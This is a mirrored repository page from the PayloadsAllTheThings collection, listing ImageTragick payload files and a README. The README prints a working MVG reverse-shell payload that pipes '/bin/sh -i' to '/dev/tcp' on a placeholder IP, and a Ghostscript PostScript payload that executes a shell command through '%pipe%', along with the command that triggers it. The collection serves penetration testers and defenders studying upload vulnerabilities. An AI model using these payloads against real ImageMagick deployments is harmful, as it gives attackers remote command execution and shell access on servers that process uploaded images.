gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
67457ec58286fadf978c1c1f93a17e5d2f9a0be8
PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik
History
Swissky f6b9d63bf8 DCOM exploitation and MSSQL CLR
2021-03-24 22:26:23 +01:00
..
convert_local_etc_passwd_html.svg
AzureHound
2020-11-24 12:41:34 +01:00
convert_local_etc_passwd.svg
AzureHound
2020-11-24 12:41:34 +01:00
ghostscript_rce_curl.jpg
DCOM exploitation and MSSQL CLR
2021-03-24 22:26:23 +01:00
imagemagik_ghostscript_cmd_exec.pdf
CVE-2019-1322 UsoSvc
2019-11-11 20:31:07 +01:00
imagemagik_ghostscript_reverse_shell.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_imageover_wget.gif
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_bind_shell_nc.mvg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_curl.png
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_portscan.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_remote_connection.mvg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_reverse_shell_bash.mvg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_url_touch.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_xml_reverse_shell_nctraditional.xml
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik2_burpcollaborator_passwd.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik2_centos_id.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik2_ubuntu_id.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik2_ubuntu_shell2.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
imagetragik2_ubuntu_shell.jpg
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00
README.md
Network Discovery - Masscan update
2019-08-29 01:08:26 +02:00

README.md

Image Tragik 1 & 2

Exploit v1

Simple reverse shell

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

Exploit v2

Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

then use convert shellexec.jpeg whatever.gif

Thanks to

Reference in New Issue View Git Blame Copy Permalink